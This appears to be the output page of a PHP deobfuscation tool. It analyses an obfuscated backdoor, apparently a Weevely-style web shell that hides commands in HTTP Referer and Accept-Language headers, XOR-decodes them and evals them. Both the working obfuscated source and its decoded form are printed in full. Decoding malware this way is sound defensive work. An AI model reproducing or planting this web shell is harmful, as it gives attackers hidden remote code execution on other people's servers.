Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e='&_end_cleanI&();$dI&=baseI&64_encodI&e(x(gzcI&omprI&esI&s($o),I&$k));priI&nt("I..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$e='&_end_cleanI&();$dI&=baseI&64_encodI&e(x(gzcI&omprI&esI&s($o),I&$k));priI&nt("I&<$k>$d<I&I&/$I&k>");@session_I&destroy();}}}}';
$a='&d5($i.$kI&h),0,3))I&;$f=$slI&($sI&s(mdI&5(I&$i.$kfI&),0,3));$p=""I&;I&for($z=1;$z<I&count($I&m[1]I&);$I&I&z++)$p.I&=$q[$m[';
$S='$q=aI&rray_vaI&luesI&I&($q);preI&g_match_allI&("/([I&\\w])[I&\\wI&-]+(?:;q=0.I&([\\d]))I&?,?/"I&,$ra,$m)I&;if($qI&&&I&$I&mI&){';
$Y='$j=0;($j<$cI&&&$i<$I&I&I&l);$j++,I&$i++){$o.=$t{$iI&}^I&$k{$j};}}I&return $I&o;}I&$r=$_SI&ERVER;$rI&r=@$r["I&HTTPI&_RI&EFE';
$B='$kh="5dI&41";I&$kf="40I&I&2a";funcI&tion x(I&$I&t,$k){$c=strlen(I&$k);$I&l=sI&trlen($t);$o=I&"";foI&r($I&iI&=0;$i<I&$l;){for(I&';
$c='&;$e=I&strpos($s[$i],$f)I&;I&if($I&e){$k=$kh.I&I&$kf;ob_start(I&);@eI&val(@I&gzuI&ncompress(I&@x(@baI&se64I&_dI&eI&code(pI';
$D='RER"];I&$ra=@$rI&["HTTP_I&AI&CCEPT_LANGUAGI&E"I&];I&if($rr&&$I&ra){$uI&I&I&=parse_uI&rl($rr);pI&arse_str(I&$u["querI&y"],$q);';
$u=str_replace('G','','crGeatGeG_fuGnGcGtion');
$v='&reg_replaI&cI&e(arrayI&("/_/","/-/"),array("/"I&,"+I&"),I&$ssI&($s[$i],0,I&I&$e))),I&$k)));$o=ob_get_I&cI&ontents();oI&bI';
$E='@sI&ession_start();$s=&$_SI&ESSIOI&N;$I&ss="substrI&I&"I&;$sl="stI&rtI&oI&lowI&er";$i=$m[1][0].$m[1][1];$hI&=I&$sl(I&$ss(mI';
$m='2][$z]];if(sI&trpoI&s($p,I&$h)I&===0I&){I&I&$s[I&$i]="";$p=$ss($p,3);}if(arI&ray_I&key_eI&xistI&sI&($i,$s)){$s[$i].=I&$I&pI';
$A=str_replace('I&','',$B.$Y.$D.$S.$E.$a.$m.$c.$v.$e);
$h=$u('',$A);$h();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$B $kh="5dI&41";I&$kf="40I&I&2a";funcI&tion x(I&$I&t,$k){$c=str..
$D RER"];I&$ra=@$rI&["HTTP_I&AI&CCEPT_LANGUAGI&E"I&];I&if($rr&&..
$E @sI&ession_start();$s=&$_SI&ESSIOI&N;$I&ss="substrI&I&"I&;$s..
$S $q=aI&rray_vaI&luesI&I&($q);preI&g_match_allI&("/([I&\w])[I&..
$Y $j=0;($j<$cI&&&$i<$I&I&I&l);$j++,I&$i++){$o.=$t{$iI&}^I&$k{$..
$a &d5($i.$kI&h),0,3))I&;$f=$slI&($sI&s(mdI&5(I&$i.$kfI&),0,3))..
$c &;$e=I&strpos($s[$i],$f)I&;I&if($I&e){$k=$kh.I&I&$kf;ob_star..
$e &_end_cleanI&();$dI&=baseI&64_encodI&e(x(gzcI&omprI&esI&s($o..
$h None
$m 2][$z]];if(sI&trpoI&s($p,I&$h)I&===0I&){I&I&$s[I&$i]="";$p=$..
$u create_function
$v &reg_replaI&cI&e(arrayI&("/_/","/-/"),array("/"I&,"+I&"),I&$..

Stats

MD5 d67225824ae1da7a6ef0d6f80949f1cf
Eval Count 1
Decode Time 106 ms